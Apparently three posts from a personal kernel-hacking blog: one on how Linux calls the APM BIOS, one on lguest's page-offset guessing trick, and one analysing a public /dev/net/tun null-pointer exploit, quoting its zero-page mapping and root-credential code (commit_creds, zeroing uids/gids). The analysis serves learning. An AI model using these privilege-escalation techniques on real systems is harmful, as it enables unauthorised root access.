Thanks to the “Understanding the Linux Kernel” I spent several hours trying to understand the APM code used to ‘call’ the APM Protected Mode 32-bit Interface Connect.
Of course APM is deprecated since ages I think, but I was curious. 😛

As the APM 1.2 specification states:

The APM BIOS 32-bit protected mode interface requires 3 consecutive
selector/segment descriptors for use as 32-bit code, 16-bit code, and data segments,
respectively. Both 32-bit and 16-bit code segment descriptors are necessary so the
APM BIOS 32-bit interface can call other BIOS routines in a 16-bit code segment if
necessary. The caller must initialize these descriptors using the segment base and
length information returned from this call to the APM BIOS. These selectors may
either be in the GDT or LDT, but must be valid when the APM BIOS is called in
protected mode.

So, at boot time, Linux will query the BIOS/APM for information about the base and length of the segments that APM code uses(query_apm_bios()):

        /* 32-bit connect */ = 0x03;
	intcall(0x15, &ireg, &oreg);

	boot_params.apm_bios_info.cseg        =;
	boot_params.apm_bios_info.offset      = oreg.ebx;
	boot_params.apm_bios_info.cseg_16     =;
	boot_params.apm_bios_info.dseg        = oreg.dx;
	boot_params.apm_bios_info.cseg_len    =;
	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
	boot_params.apm_bios_info.dseg_len    = oreg.di;

These are the values that Linux will use to set-up the appropriate segments in the Global Descriptor Table(GDT).

	 * Set up the long jump entry point to the APM BIOS, which is called
	 * from inline assembly.
	apm_bios_entry.offset = apm_info.bios.offset;
	apm_bios_entry.segment = APM_CS;
	 * The APM 1.1 BIOS is supposed to provide limit information that it
	 * recognizes.  Many machines do this correctly, but many others do
	 * not restrict themselves to their claimed limit.  When this happens,
	 * they will cause a segmentation violation in the kernel at boot time.
	 * Most BIOS's, however, will respect a 64k limit, so we use that.
	 * Note we only set APM segments on CPU zero, since we pin the APM
	 * code to that CPU.
	gdt = get_cpu_gdt_table(0);
	set_desc_base(&gdt[APM_CS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg << 4));
	set_desc_base(&gdt[APM_CS_16 >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg_16 << 4));
	set_desc_base(&gdt[APM_DS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.dseg << 4));

So, now the APM segments(their descriptors) are ready to use.

The code used to make an APM BIOS call looks like this:

static inline void apm_bios_call_asm(u32 func, u32 ebx_in, u32 ecx_in,
					u32 *eax, u32 *ebx, u32 *ecx,
					u32 *edx, u32 *esi)
	 * N.B. We do NOT need a cld after the BIOS call
	 * because we always save and restore the flags.
	__asm__ __volatile__(APM_DO_ZERO_SEGS
		"pushl %%edi\n\t"
		"pushl %%ebp\n\t"
		"lcall *%%cs:apm_bios_entry\n\t"
		"setc %%al\n\t"
		"popl %%ebp\n\t"
		"popl %%edi\n\t"
		: "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx),
		  "=S" (*esi)
		: "a" (func), "b" (ebx_in), "c" (ecx_in)
		: "memory", "cc");

It took me a while to figure out the long jump.

lcall *%%cs:apm_bios_entry

because apm_bios_entry is defined as:

static struct {
        unsigned long   offset;
        unsigned short  segment;
} apm_bios_entry;

At first I though that the struct should be defined the other way around(first the segment and then the offset).
I experimented a bit with inline asm, and after lots of segmentation faults, and some time going over Intel x86 manuals about the ljmp instruction, I figured it out.

Well, I think it took much much longer than it should to understand was going on. :S

The ljmp expects a mem16:mem32 operand, where mem16 is the segment, and mem32 the offset.
And that’s exactly how the struct apm_bios_entry is stored in memory.
However, as I ‘read’ mem16:mem32, I thought that mem16 should be stored before mem32. :S

And thus I lost several hours writing and experimenting with segfaulting C code. 😛
For something pretty obvious…


Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux Kernel, which is mainly used for experimentation, and learning stuff about hypervisors, operating systems, even computer architecture/ISA(x86 in particular).

Today I cloned the git repo for the lguest64 port, and I started browsing through the documentation and the code. In the launcher code(the program that initializes/sets up and launches a new guest kernel), I saw the coolest programming hack/trick I’ve seen in a long time. 😛

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *  movl <some-address>, %eax
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 * In this example can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	errx(1, "could not determine page offset");

It’s very well commented, and so I don’t think there’s something I could explain any better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ 😉

Gimme root!

February 17, 2011

I was looking at the Linux Kernel null-pointer dereferencing exploit in the /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came along some things I hadn’t seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. 😛

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;

Thus, I learned that the SVR4 personality(generally when the MMAP_PAGE_ZERO flag is set in the personality) maps the zero page, and fills it with zeros, and that’s why we use mprotect for SVR4, instead of mmap, since zero page is already mapped.

The gimme-root code, was also fun(spender did he best to mock SELinux :P). However the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		got_root = 1;

where init_cred is the credential struct used by init(aka root :P), and commit_creds points to the kernel symbol/function which is used to manage credentials. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so instead maybe we could craft a new cred struct with uid/gid=0 and then call prepare_creds/commit_creds.

Afaik, this credential ‘framework’ was introduced with Linux Kernel 2.6.30, so spender provides another ‘old-school’ 😛 way to get root credentials, in older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	return current;

static void old_style_gimme_root(void)
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))

	if ((unsigned long)current >= (orig_current + 0x1000))

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;


which gets the current task’s stack, searches for our uids/gids, and then it sets them to 0(aka root :P).

The exploit itself is brilliant, and LWN has two very nice articles, which explain how the exploit actually works(although spender has commented more than enough–commenting on Linux Kernel security, full disclosure of security bugs etc etc).